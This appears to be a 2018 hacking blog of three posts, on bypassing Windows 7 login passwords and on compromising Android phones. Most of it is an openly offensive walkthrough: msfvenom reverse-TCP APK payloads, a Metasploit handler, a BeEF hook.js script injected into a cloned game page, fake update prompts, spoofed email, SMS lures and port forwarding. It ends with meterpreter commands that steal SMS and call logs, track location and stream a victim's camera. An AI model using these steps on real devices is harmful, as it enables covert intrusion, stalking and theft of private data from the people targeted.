Thursday, 12 April 2018

Easy Ways to Bypass Windows 7 Ultimate Password - SAMHACKERSWORLD

Password is used to protect personal information on computer. However, sometimes people may forget or lost their password and cannot login their PC, which causes mach inconvenience. To help you get access to computer quickly, here we list top 3 ways to hack Windows 7 Ultimate admin and user password for your reference.


Method 1: Break Windows 7 Ultimate Password from Safe Mode


If the built-in administrator is enabled, you can crack computer login password on Windows 7 with command prompt from safe mode.


Step 1: Turn off your computer and restart it, enter F8 to get in Advanced Boot Options.


Step 2: You can see three types of safe mode, Safe Mode, Safe Mode with Networking and Safe Mode with Command Prompt. Select Safe Mode with Command Prompt and then press Enter.


Step 3: Type net user in the command prompt window and press Enter. Find out the login user in the list of user accounts and replace the login password with it.


Method 2: Bypass Windows 7 Ultimate Login Password with Password Reset Disk


Another easy way for bypassing windows 7 ultimate login password is to reset the disk. Windows system allows user to create a password reset disk for free with its built-in feature, here's the steps:


Step 1: After entering the wrong code to log in, you'll see a message noticing that the password is not correct, click "OK" to go on.


Step 2: Click "Reset Windows Password" and follow the steps on Windows to finish this process.


Step 3: Tap your new password and log on computer successfully.


Method 3: Crack Windows 7 Ultimate Login Password with Professional Software


If you're lacking a little luck and the solutions above failed to work, the best Windows 7 Password crack - Windows Password Key becomes your best comforter. It is expert in cracking windows password without resetting disk or using cd. You can use this amazing tool to recover your lost password or reset a new one with easy, let's see how it works:


Step 1: Download and install this program in any working computer and then launch it. Burn a CD/DVD/USB drive with default ISO image or a new ISO image.


Step 2: Insert newly created CD/DVD/USB into your password-protected computer and reboot your PC from CD/DVD/USB disk: press "F12" to enter "Boot Menu".


Step 3: Select the user account which you want to remove, and then hit "Remove Windows Password". Click "Next" to confirm.


Step 4: Now the password on your computer has been cracked successfully, click "Reboot" to restart your computer and login Windows system without any password.


By far, you must know how to hack administrator password on windows 7 clearly. Windows Password Key really can be the best windows 7 ultimate password breaker, doesn't it?


Tuesday, 10 April 2018

Android Hacking part-2: Install apps without touching phone - SAMHACKERSWORLD

As I promise you in the previous article that my next post will be related to android hacking. In this article, you will learn how to install apps in your victim phone easily or without touching his/her phone.


I know it is not easy to take someone phone then install the ap and if you forget to open the app then no results.

If you have any problem, suggestion let me know by comments I help everyone.

Note: This is for education purpose only. Please don’t misuse it.

Requirements

beef


metasploit


Patience  (most of the readers don’t have patience )


Practical

We will create an android payload or virus or malicious app using Metasploit. I already posted here to generated android payload using Metasploit check it.

After creating the app, you launch Metasploit and wait for receiving the connection. Here are commands

┌─[ root@kali ]-[~]


└──╼ # service postresql start;msfconsole

It will launch Metasploit. Further commands

┌─[ root@kali ]-[~]

└──╼ # use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost <local IP address>; set lport 4444

Remain this terminal as and follow further steps.

Launch beef. In Kali, you can start from the sidebar.

In parrot or any other security distribution, you can launch using this command.


┌─[ root@kali ]-[~]

└──╼ # beef-xss

Beef is browser exploitation framework. No matter either victim is using chrome, firefox you will not face any problem.

As you can see in the screenshot, it asks for the username and password. These are default username and password.

beef

beef

After the successful login, a new webpage will open where in the sidebar, there are two directories online browser and offline browser. We can hook browser using a script then we will able to run own codes to the victim browser. When you hook a browser, it will show in the online browser. If it is confusing, don’t worry you will understand everything.

Beef also launch a terminal when you start it. Here is the screenshot of terminal I have highlighted the example remember it we will use in future.

To hook own browser visit this link http://127.0.0.1:3000/demos/basic.htmlor insert script tag. When you open this beef will show something like this.

Meaning you hooked your browser (127.0.0.1 mean your browser).  Click on 127.0.0.1 and choose commands. In the commands tab expend social engineering and pick Fake update bar (chrome) because I’m using chrome you can find victim browser using details tab.

Open a new terminal and type ifconfig to find your IP address.

In my case, it is 192.168.43.7.

To hook a victim, my URL will be http://192.168.43.7:3000/demos/basic.html.

Connect your phone to the same network that you are using on your computer. Open this URL on the android phone here is what I got on the beef control panel. In the commands expend social engineering and choose Fake update bar (chrome) because I’m using chrome you can find browser using details tab.

In the URL we will place our android payload URL. You can upload payload to the very famous website like google drive or start own server.

Just run this command.

┌─[ root@kali ]-[~]

└──╼ # service apache2 start

After this copy your android virus that you generated in the first step to /var/www/ directory. So URL of the Android virus is http://<IP>/appname.apk

I think you know how to find local IP address. Paste in URL tab of beef and click on execute.

On executing your android phone will show you something like this.

If you choose Install Missing Plugins, then the app will start downloading.

Tap on open, the app asks for installation. After installing when you open it, you will be in the browser app (because our app will display nothing). 

But we will get a meterpreter session.

I already posted how to hide app icon, get meterpreter season again and again in the first post of Android hacking.

How to perform a real task


In the actual case, we can’t send the link like this. Your victim will close tab immediately. So we should create something engaging.

I found a snake script. It is the game developed using JavaScript you can download it from GitHub.

Note: This game only works with arrow keys. Maybe android user will be unable to play the game. So we will show install missing plugins to play the game.

Here are simple steps to do this.

First of clone this game from Github.

┌─[ root@kali ]-[~]

└──╼ # git clone https://github.com/Mariacristina88/Snake-game.git; cp -r ./Snake-game /var/www/html; nano  /var/www/html/Snake-game/snakegame.html

If above Linux commands confuse you then read my Linux commands for beginners post. Semicolon (;) is used to run two or more commands in the single line.

It will download and copy the game to HTML folder and open snakefile.html. Just insert this script tag.

<script src="https://192.168.43.60:3000/hook.js"></script>

Press ctrl+o to save ctrl+x to exit.

Now, send URL http://192.168.43.60/Snake-game/snakegame.htmlto your victim. You can port forward your router to perform it over the internet.

Now when our victim opens the link, he will see something like this.

And we will get hook that browser.  After that repeat above steps to install apps

Tip: you can add custom CSS to make fake update clear. So our victim will install app successfully.

Part-2 Email spoofing


As clear from its name we will spoof our email address. I mean you can send email from any address (yeah from even bill gates email address, do you have bill gates email address?). To spoof an email address, you need only SMTP settings.

Don’t confuse by above words there are tools and websites.

I use https://emkei.cz/ For sending spoofing emails.

This website has a straightforward interface. Just enter to, from, subject, message and send the message.

But Gmail service will catch it and move emails to spam.

In case if your victim is using webmail service then 99% chances are that your message will appear in the inbox.

Here is the screenshot of mail I send to my webmail using this website. 

Thus using spoofing email, you send the malicious app to your victim. Just make sure your message should be real and quick.

Problem with this method is who used webmail on the android phone, or my victim is using Gmail.

Well, this is part of social engineering. You should find your way to hack your victim phone. Don’t we will go further in advance of Android hacking but due to exams i will publish next article in futue.

How to hack android smartphone with an sms remotely using kali linux - SAMHACKERSWORLD

There's lots of ways to hack android smartphone using kali linux and metsploit but all those tricks are working only on local network but today i came up with idea to hack android smartphone using public ip with kali linux os and metsploit(msfvenom).Main Advantage of this hack is it work outside the network.so if person is not connected to same wifi we can also hack him using msfvenom.

Requires:

1. Kali Linux OS.

2. Mobile Number.

3. Mobile Number Operator(As We Would Send Him as message as we are operator).

4. Router Supporting Port Forwarding.



Metasploit


How to hack android smartphone with msfvenom on kali linux?


1.Open a terminal and build the android application using below command:


msfvenom -p android/meterpreter/reverse_tcp LHOST=158.458.11.236 LPORT=8080 R > hacking.apk

158.458.11.236 => Is Your Public Ip Address where the application will respond back.

8080 => Is The Port On Which the application will work

Get Your Public Ip by Searching Whats My ip upon google

Use that ip then

Suppose i got 158.458.11.236 from google

Now dump the android application into /var/html/www directory of kali linux using below command:

cp hacking.apk /var/html/www/

2.Now open another terminal and load metasploit console by typing below command:

msfconsole

  

3.Then load the multi-handler exploit by typing : 

use exploit/multi/handler 

4.Finally it's time to generate the payload to communicate with an android smartphone:

set payload android/meterpreter/reverse_tcp

set lhost 158.458.11.236

set lport 8080

5.At last type: exploit to start the listener   

6.Now our background is set let do the main work For port Forwarding 

1st Method

Open You Router Setting

Go to Virtual Server in router and then set this options

Service Port => 80

Internal Port => 8080

Ip Address => Your Kali Machine IP Address

Protocol => All

2nd Method

Open You Router Setting

Go to Forwarding Then to DMZ

Enter Ypur Ipaddress Of Kali Machine and enable it

   

7.Now we will be using Online SMS Service to send User The SMS (There Are Many Search for SMS Gateway Online).

we send our public ip in sms so when user click on our public ip, malicious application will automatically get downloaded into user smartphone.

As and when victim install the application attacker get the terminal access which allow attacker to do the funny stuffs like

a.To check whether device is rooted or not type below command:

check_root


b.Check victim’s mobile exact location type:

wlan_geolocate


it will show the exact location of victim mobile on Google maps

c.To download victim call logs from their mobile type:

dump_calllog


It will download and store txt file of call logs in your root directory

/root/calllog_dump.txt


d.To download sms dump type:

dump_sms


it will also download and store txt file of sms dump in your root directory

e.To send sms from hacked android mobile phone to someone else type:

send_sms -d “number of the person whom you want to send sms” -t “message you want send”

ex: send_sms -d 9599***847 -t hacked

f.To capture pic from victim’s mobile camera type:

webcam_list

g.it will provides you a list of all webcams on the victim mobile then select from the list and type:

webcam_snap 2


h.to stream live feed from victim’s mobile camera type:

webcam_stream


it will automatically open up a browser and you will see live feed from their camera